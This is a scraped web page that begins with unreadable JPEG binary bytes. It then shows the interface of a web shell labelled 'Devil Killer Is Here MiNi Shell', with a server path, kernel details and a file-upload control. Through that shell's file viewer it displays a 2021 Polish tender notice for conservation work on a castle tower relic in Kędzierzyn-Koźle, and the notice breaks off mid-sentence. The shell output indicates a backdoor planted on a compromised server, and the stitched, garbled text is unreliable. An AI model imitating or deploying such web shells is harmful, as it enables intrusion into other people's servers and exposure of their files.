JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210610/0007887201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00078872 z dnia 2021-06-10</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prace konserwatorskie związane z zabezpieczeniem reliktu średniowiecznej wieży zabytkowego kompleksu zamkowego w Kędzierzynie-Koźlu – II POSTĘPOWANIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kędzierzyn-Koźle - Urząd Miasta</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412912</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piramowicza 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@kedzierzynkozle.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kedzierzynkozle.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace konserwatorskie związane z zabezpieczeniem reliktu średniowiecznej wieży zabytkowego kompleksu zamkowego w Kędzierzynie-Koźlu – II POSTĘPOWANIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ad456628-c9d7-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00078872</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001345/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Rewitalizacja zabytkowego kompleksu zamkowego w Koźlu- wykonanie prac konserwatorskich przy relikcie wieży</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:<br/>1.Niniejsze postępowanie jest prowadzone w języku polskim. Dokumenty sporządzone w języku<br/>obcymsą składane wraz z tłumaczeniem na język polski.2. W niniejszym postępowaniu<br/>komunikacjaZamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji<br/>elektronicznej, zapośrednictwem Platformy on-line działającej pod adresem https://e-propublico.pl.3. W<br/>uzasadnionychprzypadkach np. awarii platformy dopuszczalna jest komunikacja za pośrednictwem<br/>pocztyelektronicznej na adresy wskazane poniżej, z zastrzeżeniem, że ofertę składa się tylko<br/>zapośrednictwem platformy e-ProPublico.4. Korzystanie z Platformy przez Wykonawcę jest<br/>bezpłatne.5.Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunkikorzystania z Platformy określone w Regulaminie zamieszczonym na stronie<br/>internetowej https://e-ProPublico.pl/ oraz uznaje go za wiążący.6. Ofertę, wraz ze stanowiącymi jej<br/>integralną częśćzałącznikami, składa się pod rygorem nieważności w formie elektronicznej (podpisaną<br/>kwalifikowanympodpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisemosobistym za pośrednictwem Platformy.7. Szczegółowe informacje o sposobie<br/>porozumiewania się iwymagania formalne dotyczące składanych dokumentów zostały opisano w<br/>rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzeniaParlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osóbfizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takichOgłoszenie nr<br/>2021/BZP 00023617/01 z dnia 2021-03-262021-03-26 Biuletyn Zamówień Publicznych Ogłoszenie o<br/>zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy -<br/>Roboty budowlanedanych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L119 z04.05.2016, str. 1), dalej „RODO”, informuję, że: 1) administratorem<br/>Pani/Pana danychosobowych jest Urząd Miasta Kędzierzyn-Koźle, z siedzibą przy ul. Grzegorza<br/>Piramowicza 32, 47-200Kędzierzyn-Koźle, adres e-mail: prezydent@kedzierzynkozle.pl, tel. 77/40-50-<br/>338.;2) sposób kontaktuz inspektorem ochrony danych osobowych w Urzędzie Miasta Kędzierzyn-<br/>Koźle: 47-200 Kędzierzyn-Koźle, ul. Grzegorza Piramowicza 32, adres e-mail:<br/>inspektor@kedzierzynkozle.pl, tel. 77/40-50-346;3)Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanymz postępowaniem o udzielenie zamówienia<br/>publicznego prowadzonym w trybieprzetargu nieograniczonego;4) odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawyPzp, a także Spółka Datacomp Sp. z o.o. z siedzibą w<br/>Krakowie (adres: ul. Gen. HenrykaDąbrowskiego 24,30-532 Kraków), nr Rejestru KRS 0000193067,<br/>jako właściciel Platformy on-linedziałającej pod adresem https://e-ProPublico.pl/, na której Zamawiający<br/>prowadzi postępowania oudzielenie zamówienia publicznego;5) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art.78 ust. 1ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, ajeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwaniaumowy;zgodnie z Rozporządzeniem Prezesa Rady<br/>Ministrów z dnia 18 stycznia 2011 r. w sprawieinstrukcji kancelaryjnej, jednolitych rzeczowych wykazów<br/>akt oraz instrukcji w sprawie organizacji izakresudziałania archiwów zakładowych (tj. Dz.U z 2011 nr<br/>14, poz. 67 z późn. zm.) teczki aktowebędą przechowywane w archiwum zakładowym przez okres 5 lat<br/>w przypadku dokumentacjizamówień publicznych oraz 10 lat w przypadku umów zawartych w wyniku<br/>postępowania w trybiezamówień publicznych;Szczegółowy opis ochrony danych osobowych zebranych<br/>przez Zamawiającego w toku postępowania został zawarty w pkt 24 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.42.2021.AW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przeprowadzenie prac konserwacyjnych oraz robót budowlanych reliktu wieży zamkowej zlokalizowanej na działce nr 1935/9, obręb Koźle na terenie kompleksu zamkowego <br/><br/>2.	Zakres zamówienia obejmuje:<br/>1)	przeprowadzenie prac konserwatorskich reliktu wieży zamku w Koźlu według programu prac konserwatorskich autorstwa mgr Doroty Kowalik-Kociszewskiej z sierpnia 2020 roku, uzgodnionego przez Opolskiego Konserwatora Zabytków pod nr ZN.5142.391.2020.KO:<br/>2)	dezynfekcji porażonych biologicznie partii muru reliktu wieży;<br/>3)	oczyszczenie powierzchni muru reliktu wieży z luźnych zanieczyszczeń;<br/>4)	oczyszczenie powierzchni muru mechanicznie i chemicznie<br/>5)	wykonanie zabiegów odsolenia cegły<br/>6)	uzupełnienie ubytków w cegle zaprawami mineralnym barwionymi w masie;<br/>7)	podklejenie mniejszych spękań w zaprawie i spoinie;<br/>8)	wypełnienia pustych przestrzeni i głębokich spękań w murze z zastosowaniem wapiennej zaprawy iniekcyjnej;<br/>9)	uzupełnienia spoin oraz założenia opasek podtrzymujących obluzowane cegły z zastosowaniem zaprawy mineralnej wapienno-glinianej<br/>10)	wykonania wzmocnienia struktury muru z zastosowaniem roztworu żywicy akrylowej w toulenie z benzyną lakową;<br/>11)	wykonania w wolnych przestrzeniach a także w górnych warstwach gleby przy murze, wstawek z rudy darniowej;<br/>12)	podmurowania północno-zachodniej skarpy narożnika cegłą analogiczną do istniejącej pod względem właściwości, wymiarów i kolorystyki;<br/>13)	wykonania zabezpieczenia korony muru z zastosowaniem szlamu mineralnego z dodatkiem gliny;<br/><br/>14)	przeprowadzenie robót budowlanych w zakresie poprawy warunków mikroklimatycznych pomieszczenia ekspozycyjnego reliktu wieży zgodnie z projektem budowlanym autorstwa inż. Tomasz Butwickiego z sierpnia 2020, uzgodnionego przez Opolskiego Konserwatora Zabytków pod nr ZN.5142.391.2020.KO<br/>15)	zamontowanie w pomieszczeniu ekspozycyjnym reliktu wieży na nawiewach wentylacyjnych kształtek kierunkowych wyposażonych w żaluzje regulujące wywiew powietrza;<br/>16)	przeniesienie czujnika temperatury i wilgotności w pomieszczeniu ekspozycyjnym reliktu wieży do wnętrza reliktu;<br/>17)	montaż nawilżacza powietrza wewnątrz reliktu;<br/>18)	zamontowanie rolety poziomej w świetliku nad reliktem wieży, sterowanej zdalnie;<br/>19)	uszczelnienie szklanych drzwi zlokalizowanych w obrębie ściany południowej oraz ściany wschodniej pomieszczenia ekspozycyjnego reliktu wieży<br/>20)	wykonanie robót elektrycznych związanych z zasilaniem i sterowaniem rolety w świetliku nad reliktem, nawilżacza powietrza oraz oświetleniem ekspozycji reliktu;<br/>21)	wykonanie dokumentacji konserwatorskiej z przeprowadzonych prac oraz powykonawczej zgodnie z wymaganiami przepisów o ochronie zabytków;<br/>22)	Zabezpieczenie pomieszczeń, zbiorów muzealnych oraz wyposażenia Muzeum Ziemi Kozielskiej w związku z prowadzonymi pracami konserwatorskimi reliktu wieży i robotami budowlanymi stanowiącymi przedmiot zamówienia, w tym:<br/>a)	Wykonanie szczegółowego planu organizacji robót i zabezpieczenia pomieszczeń, zbiorów muzealnych i wyposażenia Muzeum Ziemi Kozielskiej w formie pisemnej i zatwierdzenie przez przedstawiciela Muzeum Ziemi Kozielskiej oraz inspektora nadzoru inwestorskiego, najpóźniej do dnia przekazania placu budowy. Plan organizacji robót i zabezpieczenia, należy wykonać zgodnie z wytycznymi zawartymi w „Wytycznych ws. Konserwacji Donżonu” z dnia 30.04.2021r. opracowanymi przez Muzeum Ziemi Kozielskiej.<br/>b)	Wykonanie zabezpieczenia pomieszczeń, zbiorów i wyposażenia zgodnie z zatwierdzonym planem organizacji robót i zabezpieczenia, o którym mowa w pkt a).<br/><br/><br/>3.	Przedmiot zamówienia obejmuje również:<br/>1)	przeprowadzenie prac konserwatorskich, robót budowlanych i innych czynności składających się na przedmiot zamówienia zgodnie z warunkami pozwolenia konserwatorskiego decyzją nr 730/N/2020 z dnia 18.08.2020 oraz zmiany tego pozwolenia decyzją nr 1162/N/2020 z dnia 15.12.2020 r. wydanymi przez Opolskiego Wojewódzkiego Konserwatora Zabytków;<br/>2)	uzyskanie wymaganych prawem (pozytywnych) uzgodnień i opinii w tym, zgodnie z wymogami konserwatorskimi, szczegółową dokumentację techniczną rolety poziomej montowanej na świetliku nad reliktem wieży należy uzgodnić z Opolskim Wojewódzkim Konserwatorem Zabytków<br/>3)	uzyskanie zezwolenia na czasowe zajęcie pasa drogowego jeśli zajdzie taka konieczność w związku z realizacją przedmiotu zamówienia i obejmuje to również opracowanie tymczasowej organizacji ruchu oraz poniesienie kosztów z tym związanych;<br/>4)	zabezpieczenie terenu, pomieszczeń i ciągów komunikacyjnych związanych z przeprowadzanymi pracami konserwatorskimi i robotami budowlanymi, w sposób zapewniający bezpieczeństwo ludzi i mienia oraz bezpieczeństwo zgromadzonych w muzeum zbiorów;<br/>5)	uporządkowanie terenu, pomieszczeń i ciągów komunikacyjnych po zakończeniu prac konserwatorskich i robót budowlanych; <br/>6)	zagospodarowanie odpadów powstałych przy realizacji przedmiotu umowy zgodnie z obowiązującymi przepisami dotyczącymi gospodarki odpadami. Wykonawca jest zobowiązany udokumentować Zamawiającemu sposób zagospodarowania powstałych w wyniku prowadzenia robót odpadów zgodnie z obowiązującymi przepisami dotyczącymi gospodarki odpadami nie później niż z dniem zawiadomienia o zakończeniu robót budowlanych;<br/>7)	Odbiór konserwatorski z udziałem Opolskiego Wojewódzkiego Konserwatora Zabytków oraz inwestora i użytkownika;.<br/>8)	Sporządzenie inwentaryzacji fotograficznej terenu i pomieszczeń, polegającej w szczególności na uwidocznieniu ogólnego miejsc przed rozpoczęciem robót. Inwentaryzację Wykonawca przekaże Zamawiającemu w wersji elektronicznej na nośniku danych CD w terminie 5 dni od dnia przekazania placu budowy.<br/>9)	Wykonanie w okresie udzielonej przez Wykonawcę gwarancji wymaganych przeglądów gwarancyjnych zabudowanych urządzeń rolety pionowej świetlika, nawilżacza i innych, a także wykonanie czynności konserwacyjnych tychże urządzeń, warunkujących utrzymanie gwarancji oraz ich prawidłowe funkcjonowanie w okresie gwarancji i po jej zakończeniu.<br/> <br/>4.	Wymóg zatrudnienia na podstawie umowy o pracę. Na podstawie 95 ust. 1 ustawy Pzp. Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy, osób wykonujących następujące czynności związane z realizacją zamówienia:<br/>	prace konserwatorskie<br/>	roboty budowlane<br/>Sposób weryfikacji zatrudnienia, uprawnienia zamawiającego w zakresie kontroli oraz sankcje <br/>z tytułu niespełnienia wymagań zostały określone w Projektowanych postanowieniach umowy.<br/> <br/>5.	Szczegółowy opis przedmiotu zamówienia określają m.in. Projektowane postanowienia umowy, OPZ oraz następujące załączniki zamieszczone na stronie internetowej Zamawiającego stanowiące integralną część SWZ:<br/>	program prac konserwatorskich autorstwa mgr Doroty Kowalik-Kociszewskiej z sierpnia 2020 roku, uzgodniony przez Opolskiego Konserwatora Zabytków pod nr ZN.5142.391.2020.KO<br/>	projekt budowlany autorstwa inż. Tomasza Butwickiego z sierpnia 2020, uzgodniony przez Opolskiego Konserwatora Zabytków pod nr ZN.5142.391.2020.KO<br/>	pozwolenie konserwatorskie decyzja nr 730/N/2020 z dnia 18.08.2020 oraz zmiana tego pozwolenia decyzja nr 1162/N/2020 z dnia 15.12.2020 r. wydane przez Opolskiego Wojewódzkiego Konserwatora Zabytków<br/>	Wytyczne ws. Konserwacji reliktu Dożonu z dnia 30.04.2021r.<br/>6.	Szczegółowe wymagania dotyczące przedmiotu zamówienia wskazane zostały w załączniku nr 8 do SWZ -Opis Przedmiotu Zamówienia. <br/>7.	Zamawiający przewiduje możliwość odbycia przez Wykonawcę wizji lokalnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin/Cof) * 100 * waga<br/>gdzie:<br/> - Cmin – najniższa cena spośród wszystkich ofert<br/> - Cof – cena badanej oferty<br/>Okres gwarancji (miesiące)- min. 36 max oceniany 60 miesięcy<br/>Liczba punktów = (Gof/G max ) * 100 * waga<br/>gdzie:<br/> - Gof – gwarancja badanej oferty<br/> - G max – najdłuższy spośród wszystkich okres gwarancji<br/>Uwagi:<br/>Termin gwarancji należy podać w miesiącach.<br/>W przypadku, gdy Wykonawca określi okres gwarancji dłuższy niż 60 miesięcy to Zamawiający do obliczeń będzie przyjmował okres wynoszący 60 miesięcy, natomiast umowa zostanie zawarta z uwzględnieniem długości okresu gwarancji zadeklarowanego w ofercie. <br/>Zamawiający odrzuci oferty, które będą zakładały gwarancję krótszą niż 36 miesięcy. <br/>W przypadku nie podania w ofercie okresu gwarancji Zamawiający odrzuci ofertę. <br/>Pozostałe oferty otrzymają liczbę punktów wynikającą z liniowej zależności.<br/><br/>Termin realizacji zamówienia [dni] nie dłużej niż 240 dni kalendarzowych od daty przekazania placu budowy (minimalny oceniany 168 dni kalendarzowych od daty przekazania placu budowy)<br/>Liczba punktów = (T min/Tof) * 100 * waga<br/>gdzie:<br/> - T min – wartość najniższa spośród wszystkich ofert<br/> - T of – wartość badanej oferty <br/>Uwagi:<br/>Termin wykonania należy podać w dniach, licząc od daty przekazania placu budowy.<br/>Zamawiający odrzuci oferty, które będą zakładały termin wykonania dłuższy niż 240 dni kalendarzowych od daty przekazania placu budowy. <br/>Zamawiający odrzuci oferty, które będą zakładały termin wykonania krótszy niż 168 dni kalendarzowych od daty przekazania placu budowy.<br/>W przypadku nie podania w ofercie któregokolwiek z terminów Zamawiający odrzuci ofertę. <br/>Pozostałe oferty otrzymają liczbę punktów wynikającą z liniowej zależności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowaI Wykonawca musi wykazać, że nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wykonał należycie:prace konserwatorskie i roboty w zakresie<br/>konstrukcyjno-budowlanym na wartość łączną minimum 900.000 000 zł wykonane na obiektach<br/>wpisanych do rejestru zabytków.W/w doświadczenie można wykazać maksymalnie w dwóch<br/>umowach.Do przeliczenia wszystkich wartości finansowych, a występujących w innych walutach<br/>niż PLN Wykonawca zastosuje średni kurs Narodowego Banku Polskiego (NBP) opublikowany<br/>w dniu ukazania się ogłoszenia o 